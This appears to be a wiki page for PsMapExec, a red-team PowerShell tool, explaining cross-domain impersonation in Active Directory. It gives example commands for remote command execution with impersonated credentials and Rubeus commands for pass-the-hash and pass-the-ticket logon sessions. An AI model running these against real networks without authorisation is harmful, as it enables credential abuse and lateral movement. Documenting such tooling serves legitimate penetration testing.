Skip to content

05 ‐ Cross Domain Usage

Jump to bottom
The-Viper-One edited this page Jun 3, 2025 · 8 revisions

Overview

PsMapExec allows for user impersonation across trusted Active Directory domains, enabling access to resources in a different domain than the one the user's account resides in.

Domain Targeting

To impersonate a user from one domain and access resources in another, two key parameters must be specified:

  • -Domain: The domain you intend to access resources in.
  • -Username: The user account to impersonate, provided in UPN (User Principal Name) format — e.g., [email protected].

Command Example

PsMapExec [Method] -Targets All -Domain dev.security.local -Username "[email protected]" -Password "Password123" -Command "whoami"

In this example:

  • We're targeting a Domain Controller in dev.security.local.
  • The user [email protected] (from the parent domain) is being impersonated.
  • Since security.local is the parent domain of dev.security.local, an implicit trust exists, allowing Moe to authenticate and access resources in the child domain.

Example Output

PS > PsMapExec WMI -Targets DEVDC01 -Domain dev.security.local -Username [email protected] -Password Password123 -Command whoami

WMI   10.10.10.150    DEVDC01.dev.security.local   Windows Server 2022 Standard   [+] SUCCESS
security\moe

Using a Separate Logon Session

Instead of supplying credentials directly, you can create a new logon session under the context of a user from another domain. This is useful for OPSEC or when reusing credential material (e.g., hashes or tickets).

Tools

  • Runas.exe: Best when you have the password.
  • Rubeus: Preferred when you need to use a hash or Kerberos ticket.

Create a Logon Session

# Using Runas.exe with a password
Runas.exe /user:domain\user powershell.exe

# Using Rubeus to start a netonly session
Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /show

# Using Rubeus to request and inject a TGT
Rubeus.exe asktgt /user:User /domain:Domain /hash:Hash /ptt

Once the new session is active, execute PsMapExec without supplying any credential parameters, as it will use the current session's context.

PsMapExec [Method] -Targets All -Domain [Domain] -Command "whoami"
Clone this wiki locally